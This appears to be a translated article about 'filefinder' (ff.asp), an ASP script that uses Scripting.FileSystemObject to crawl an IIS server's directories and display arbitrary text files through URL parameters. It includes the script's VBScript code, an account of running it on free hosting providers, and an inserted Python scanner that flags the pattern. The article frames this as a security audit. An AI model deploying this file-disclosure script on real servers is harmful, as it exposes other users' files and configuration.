Scripting.FileSystemObject is one of the COM objects that scrrun.dll provides for VBScript / JScript. It offers very convenient access to text files and directories, but it also poses a certain security threat to the data on an IIS web server.

The filefinder code is very simple: it consists of three functions plus about 30 lines of sequential code.

The most critical function is findfiles, which traverses a directory by calling itself recursively and searches for files with a specific file name extension.

function findfiles(strstartfolder, strext)
    dim n
    dim othisfolder
    dim ofolders
    dim ofiles
    dim ofolder
    dim ofile

    ' g_fs is presumably the script's global Scripting.FileSystemObject instance; its creation is not shown here

    ' If the system administrator has set detailed permissions on the file system, the code below will raise errors,
    ' but some directories can still be seen, so we simply ignore the errors and carry on
    on error resume next

    n = 0
    response.write "<b>searching " & strstartfolder & "</b><br>"
    set othisfolder = g_fs.getfolder(strstartfolder)
    set ofiles = othisfolder.files
    for each ofile in ofiles
        ' If the file has the specified extension, output a link back to this script, but with a different cmd.
        ' Here cmd=read, that is, read out the text file at the specified physical path
        if issuffix(ofile.path, strext) then
            response.write "<a target=_blank href='ff.asp?cmd=read&path=" & server.htmlencode(ofile.path) & "'><font color='dodgerblue'>" & ofile.path & "</font></a><br>"
            if err = 0 then
                n = n + 1
            end if
        end if
    next

    ' Recurse into every subfolder and add up the matches
    set ofolders = othisfolder.subfolders
    for each ofolder in ofolders
        n = n + findfiles(ofolder.path, strext)
    next

    findfiles = n
end function

The following code parses the URL parameters:

' Read out the value of each parameter
strcmd = ucase(request.querystring("cmd"))
strpath = request.querystring("path")
strext = request.querystring("ext")
brawdata = ucase(request.querystring("raw"))

' By default, search for .asp files
if strpath = "" then
    strpath = "."
end if
if strext = "" then
    strext = ".asp"
end if

' Execute different code depending on the cmd command
' (strcmd and brawdata were upper-cased above, so they are compared with upper-case literals)
select case strcmd
    case "FIND"
        response.write findfiles(strpath, strext) & " file(s) found"
    case "READ"
        if brawdata = "T" then
            response.write readtextfile(strpath)
        else
            response.write "<pre>" & server.htmlencode(readtextfile(strpath)) & "</pre>"
        end if
    case else
        response.write "<h3>please specify a command to execute</h3>"
end select

From the above analysis we can see that, given sufficient permissions, filefinder can find arbitrary text files on the IIS web server and easily display their contents. For non-text files, it can determine whether they exist and where they are located; to a skilled attacker this information is sometimes extremely important.
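A hosting provider reviewing uploaded scripts can flag the pattern analysed above, a request parameter flowing into a FileSystemObject path argument, with a static check. The following Python scanner is an added example, not part of the original article or of filefinder; the function name find_tainted_fso_calls, the regular expressions and the sample text SAMPLE_FF (condensed from the ff.asp fragments on this page) are assumptions made for illustration.

```python
import re

# Heuristic patterns; input is lowercased first because VBScript is case-insensitive.
SOURCE = re.compile(r"\brequest\s*(\.\s*(querystring|form)\s*)?\(")
SINK = re.compile(r"\.\s*(getfolder|getfile|opentextfile|createtextfile|deletefile)\s*\(([^)]*)")
ASSIGN = re.compile(r"^\s*(?:set\s+)?(\w+)\s*=\s*(.+)$")
FUNC = re.compile(r"^\s*(?:function|sub)\s+(\w+)\s*\(([^)]*)\)")

def find_tainted_fso_calls(asp_source):
    """Return (line_no, fso_method, argument) for FSO calls whose path derives from request data."""
    # Blank out string literals and skip comment lines so only identifiers are inspected.
    code = [(no, re.sub(r'"[^"]*"', '""', line))
            for no, line in enumerate(asp_source.lower().splitlines(), 1)
            if not line.lstrip().startswith("'")]
    funcs = {m.group(1): [p.strip() for p in m.group(2).split(",")]
             for _, line in code if (m := FUNC.match(line))}
    tainted = set()
    def dirty(expr):
        return bool(SOURCE.search(expr)) or any(w in tainted for w in re.findall(r"\w+", expr))

    while True:  # flow-insensitive fixpoint, so taint also crosses function calls
        before = len(tainted)
        for _, line in code:
            if (m := ASSIGN.match(line)) and dirty(m.group(2)):
                tainted.add(m.group(1))
            for name, params in funcs.items():
                for call in re.finditer(rf"\b{name}\s*\(([^()]*)\)", line):
                    for param, arg in zip(params, call.group(1).split(",")):
                        if dirty(arg):
                            tainted.add(param)
        if len(tainted) == before:
            break
    return [(no, m.group(1), m.group(2).strip())
            for no, line in code for m in SINK.finditer(line) if dirty(m.group(2))]

# Constructed sample, condensed from the ff.asp fragments on this page.
SAMPLE_FF = '''strpath = request.querystring("path")
strext = request.querystring("ext")
response.write findfiles(strpath, strext)
function findfiles(strstartfolder, strext)
    set othisfolder = g_fs.getfolder(strstartfolder)
    for each ofolder in othisfolder.subfolders
        n = n + findfiles(ofolder.path, strext)
    next
end function'''

if __name__ == "__main__":
    for hit in find_tainted_fso_calls(SAMPLE_FF):
        print("request-controlled path reaches FSO call:", hit)
```

The check is name-based and over-approximates, so a hit is a prompt for manual review of the script, and it complements rather than replaces restrictive file system permissions.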

However, a prerequisite for these threats to data security is that the user executing ff.asp has at least read permission on the directories and files. Because the default security settings after Windows NT Server is installed let all users "read" directories and files, both the IIS default user IUSR_servername and any other user can read directory and file information. Most Windows NT Server system administrators are mainly concerned with keeping the system up and running, and are generally reluctant to change the default directory and file permissions; after all, doing so carries great risk and also calls for a good deal of experience. Therefore, we can use filefinder to check whether the file system security settings of an NT Server used as a web server are safe.

The author once set the file system permissions by hand on a server used as an IIS web server but, for lack of experience, this caused a lot of strange errors; for example, the NT Server 4.0 used in the experiment could no longer access its database. Before the file system permissions were changed, this function worked normally.

Purely for research purposes, the author also applied for free ASP space for testing (including the personal home page provided by csdn), and filefinder ran smoothly there. The personal home page applied for at http://www2.domaindlx.com/index.html, however, does not have this problem, which shows that this free ASP home page provider takes the matter quite seriously. Although domaindlx's web server runs on Windows 2000 Server, its default file system permissions and security are not very different from those of NT 4.0.

Given the author's limited ability, the discussion of this issue ends here. This article is addressed only to domestic providers of ASP-based home pages, in the hope that it helps both providers and customers with data security.

Postscript: a web service that runs other, similar server-side scripts should have the same problem on any platform, if it too provides file system functions similar to those of Scripting.FileSystemObject.

